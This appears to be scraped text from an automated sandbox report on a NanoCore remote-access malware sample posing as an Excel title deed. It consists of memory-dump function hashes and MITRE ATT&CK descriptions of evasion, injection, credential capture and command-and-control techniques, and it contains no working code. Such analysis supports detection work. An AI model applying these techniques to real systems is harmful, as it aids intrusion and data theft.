Instruction Fuzzy Hash: 09D0223214D7898FCB03073468A44AA3F244F0322030501DBC946C9863D2A0C48ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 02154CF0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97b8f34d1e90f24f294b15ee8b0bd7823b6b2280ef4cf2336a9656172fc6134
Instruction ID: e2cc978da4e2f0155ab1549a0a5991bc81c55cd96e70d12aabeb1a30cf924f1a
Opcode Fuzzy Hash: a97b8f34d1e90f24f294b15ee8b0bd7823b6b2280ef4cf2336a9656172fc6134
Instruction Fuzzy Hash: 9AD0A92108D7C49FDB0223F058602E83F220E4620470802D2C8888A2B3CA0909418712

Uniqueness

Uniqueness Score: -1.00%

Function 001523BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597160543.0000000000152000.00000040.00000001.sdmp, Offset: 00152000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b635d6b4846eedd2afbadde3eb1b38797565385c2d1d5b84a3cdaa23c1ccefdf
Instruction ID: 616a301103f528bd81e59d3916e4a0a8e7c01b5eacfc16620524fa0a280a770e
Opcode Fuzzy Hash: b635d6b4846eedd2afbadde3eb1b38797565385c2d1d5b84a3cdaa23c1ccefdf
Instruction Fuzzy Hash: EAD052353006818FDB2ACA0CC294F5973E8BB85B01F0644E8FC208F2A6C3B8EC84CA00

Uniqueness

Uniqueness Score: -1.00%

Function 003F7D62, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a67782ac32304ae8bfbed65ea5e7777d7e841998046b3f08b80e7eef5500914
Instruction ID: 1a65aedab83432a9a675d9180a33e3f5fadf22e36733b0bdebdb1256c85e2d2d
Opcode Fuzzy Hash: 9a67782ac32304ae8bfbed65ea5e7777d7e841998046b3f08b80e7eef5500914
Instruction Fuzzy Hash: 9ED05230A1420ECFCB12CF71DA100AC37F4AB0A320770072AE802ABBD9E7300C008B10

Uniqueness

Uniqueness Score: -1.00%

Function 003F0180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95bebe451099e3a2747568152991564ed38fce2dc1d870efafd827e5a0a300d6
Instruction ID: f9195209befcb5378fd8b2cdab9825b5e88f8dd5ffce6b7282b57cebff2ae8fa
Opcode Fuzzy Hash: 95bebe451099e3a2747568152991564ed38fce2dc1d870efafd827e5a0a300d6
Instruction Fuzzy Hash: C5D01230200306CFC7082B74F81D41C3379AB85609350087DDC0747B50DE76E880CA40

Uniqueness

Uniqueness Score: -1.00%

Function 003F8C88, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ecbc8de8667664d64864d412adf2e1ed3b608958749fa9b1dbf525088c7d66
Instruction ID: 5b0ebffd5de0dbc6c5cab4e65d5357b1d7cbfc4b85cddf3d03a114861d3ef391
Opcode Fuzzy Hash: d4ecbc8de8667664d64864d412adf2e1ed3b608958749fa9b1dbf525088c7d66
Instruction Fuzzy Hash: ECD012311183D4DBD34BA7B0DC9906C3A596B123753250165D1128F1D6DB350D669A6F

Uniqueness

Uniqueness Score: -1.00%

Function 003F59A0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbb784486ff3fdbd6c8c35ae6e0fe38e9a35468591701056a5afc82019989d5
Instruction ID: 9cd552acfe57e96cdd5243b24eaaf9a317b1160edc3c21d4398eb69c9751ef17
Opcode Fuzzy Hash: 2fbb784486ff3fdbd6c8c35ae6e0fe38e9a35468591701056a5afc82019989d5
Instruction Fuzzy Hash: 9CC04C34245E09CBDA0527B16D5963F365C5B446257500159E70A81A50EFA494445596

Uniqueness

Uniqueness Score: -1.00%

Function 003FC2F8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee85cb86097d83afcf8e01e8155553b7ca0a8b6d7df8d7ac5174881dcbef520
Instruction ID: 4806761654ab8213df3100fe7692abdc704a13d6db3970a4067f8636e4351639
Opcode Fuzzy Hash: 4ee85cb86097d83afcf8e01e8155553b7ca0a8b6d7df8d7ac5174881dcbef520
Instruction Fuzzy Hash: 18B092322A420C0BEA5097B57848766338C974065CF41C466B50CC2A10F59AE9601044

Uniqueness

Uniqueness Score: -1.00%

Function 003F0660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c72a1fb05f2bf60cc29ee2ec1a8747d6a8ea53bf7c3f5d988f160bffd890a1
Instruction ID: d3304f9fd8d3e907b9878efdf886fd5c6b108b55fb5f5449004be074be36f24f
Opcode Fuzzy Hash: 33c72a1fb05f2bf60cc29ee2ec1a8747d6a8ea53bf7c3f5d988f160bffd890a1
Instruction Fuzzy Hash: A6C09B7504D21CCEC34D57B55C0543D761DD7D1305770C076E60144922DD779871A555

Uniqueness

Uniqueness Score: -1.00%

Function 021507E0, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d321f74d2b7adcbd973ba0abb6e5031523496307aaa12b8cb59007d4c491112e
Instruction ID: c968743535aba88f78da16bd5318642d7c2c5491149e54bc2efd3acc8cac08bd
Opcode Fuzzy Hash: d321f74d2b7adcbd973ba0abb6e5031523496307aaa12b8cb59007d4c491112e
Instruction Fuzzy Hash: 24C09B7018031DCF82C4A7EC9648517F7DB5A59308745D2D4E41C8F111EF60D8D9CA91

Uniqueness

Uniqueness Score: -1.00%

Function 02150FDE, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d588f82f8d0a79158b672327362cb2b2c4c8136e177f8e14ec16e0b63499ffe
Instruction ID: d784fce8fe2859ec06e71f498de6867a495739156483a527ed56c10f374856dd
Opcode Fuzzy Hash: 2d588f82f8d0a79158b672327362cb2b2c4c8136e177f8e14ec16e0b63499ffe
Instruction Fuzzy Hash: 44C08C3008C358EFC305A720DC82CAD3B202A06280380024AE822000A987A00A06CA02

Uniqueness

Uniqueness Score: -1.00%

Function 003F9C38, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28110da9e2fedc5e6b9ee37488b733402b9ed0c8b19469a99b4630172694923a
Instruction ID: e13504b560896c97e8e2bc2d994d77057a4781c5c76bfc9d4fde2628b5d8ee95
Opcode Fuzzy Hash: 28110da9e2fedc5e6b9ee37488b733402b9ed0c8b19469a99b4630172694923a
Instruction Fuzzy Hash: 13B0123030460C4B1A401BB63C0472232CC6A009183C04071960DC1001F501D4100454

Uniqueness

Uniqueness Score: -1.00%

Function 003F2F38, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ae7a8918cfa7f8cc0ebe04999727697d602af32890364e52c6eabba3625618
Instruction ID: 9219a7b4a915d9d9f654f886e724aa1d5608acb90260717b957671d2e47a1034
Opcode Fuzzy Hash: c2ae7a8918cfa7f8cc0ebe04999727697d602af32890364e52c6eabba3625618
Instruction Fuzzy Hash: ABB0123031830E4B264017B27C48A37339C560051438400A0D50DC0410F590D4500040

Uniqueness

Uniqueness Score: -1.00%

Function 003F6F84, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction ID: dd2ad87ebbc35773b343de78683e2d6d48ef221bbd2212d1119064c322d97661
Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction Fuzzy Hash: 0BB092B7A04109C9DB008A84B4423EDF734E790329F204023C31052400C23201649691

Uniqueness

Uniqueness Score: -1.00%

Function 02150269, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ff59eed1a8d88ed912c09a449ef14a3e7722a27c202f4870d3d8f7b9178acd
Instruction ID: 3cf1a390d11ad3d5b90dcbe62547d2a037d14ce0afeaafc1f788048ad343c5d8
Opcode Fuzzy Hash: 02ff59eed1a8d88ed912c09a449ef14a3e7722a27c202f4870d3d8f7b9178acd
Instruction Fuzzy Hash: 0CC08C30848380CFCF0AAF30C4580443B35AF4A305B4640EEC4518A1BBE7241882D701

Uniqueness

Uniqueness Score: -1.00%

Function 02154D00, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c3f890561dba04f64afa44df18d3c8d14aec640d8e1d0e3f7b478eaeaf65e6
Instruction ID: b27048b2e4bb1664c8eff096ac3ce9fc9309462117ba5792d3e37708daf3f219
Opcode Fuzzy Hash: 55c3f890561dba04f64afa44df18d3c8d14aec640d8e1d0e3f7b478eaeaf65e6
Instruction Fuzzy Hash: 25B01230144608DB9E0037F1282862DB24E0A849063404255DC1D42611DF6454508865

Uniqueness

Uniqueness Score: -1.00%

Function 02150FE0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131a1f5345fed5c9988b285816a7219f8f397db368dd325407e175361545d509
Instruction ID: 8d436fc508f4540098749a034a4d9fe8430925be494480550106503f8f64b160
Opcode Fuzzy Hash: 131a1f5345fed5c9988b285816a7219f8f397db368dd325407e175361545d509
Instruction Fuzzy Hash: 5FB0923008832DFF8249BB61DC4695A766CBA0A6853C10056EC32011996BA06946DA96

Uniqueness

Uniqueness Score: -1.00%

Function 003F45E2, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4c8cc7aad8c413b36bdbbe0cc3c0751772e8bdaf4b64ea6f30e9604a839957
Instruction ID: fd8f22d73225d19cd5515f055fb5e9d786209d48b1e9df3859c7265c19c49a1e
Opcode Fuzzy Hash: 3e4c8cc7aad8c413b36bdbbe0cc3c0751772e8bdaf4b64ea6f30e9604a839957
Instruction Fuzzy Hash: 72B0121D10E044DB420217345C240362948B316300320C104C91342F24DBA4C0497210

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003FAF31, Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

:@lq, xrefs: 003FAFEC

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: :@lq
API String ID: 0-537014040
Opcode ID: bf1b40cbdb7714c97a4cf6943a02b782bea686696e5d2ef54477aa98d4692730
Instruction ID: ff29a10c3f7020bb4704211848ad4e0cf4d61f196cb50f12bae2dd116d0a732d
Opcode Fuzzy Hash: bf1b40cbdb7714c97a4cf6943a02b782bea686696e5d2ef54477aa98d4692730
Instruction Fuzzy Hash: 7C51E174D01208DFDB45DFA4D994AAEBBB6FF49300F20806AE909A73A4DB356945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 003FA4D8, Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

XN, xrefs: 003FA52F
VN, xrefs: 003FA51C
PWN, xrefs: 003FA509
|YN, xrefs: 003FA4E1

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: XN$PWN$|YN$VN
API String ID: 0-2814800378
Opcode ID: 3ba86a5345aa89c4057ff97dd4845c5cc059430683219a14cb64609947456fbc
Instruction ID: 669887e4555ced85fd6d61256332434cb1d936693b6e22bbb89c256bab0397ef
Opcode Fuzzy Hash: 3ba86a5345aa89c4057ff97dd4845c5cc059430683219a14cb64609947456fbc
Instruction Fuzzy Hash: 92114C30701644CF8B48FB79C458A6D37E7EFC92653504479E50ACB3A2EF359C848B66

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Original title deed.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Original title deed.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre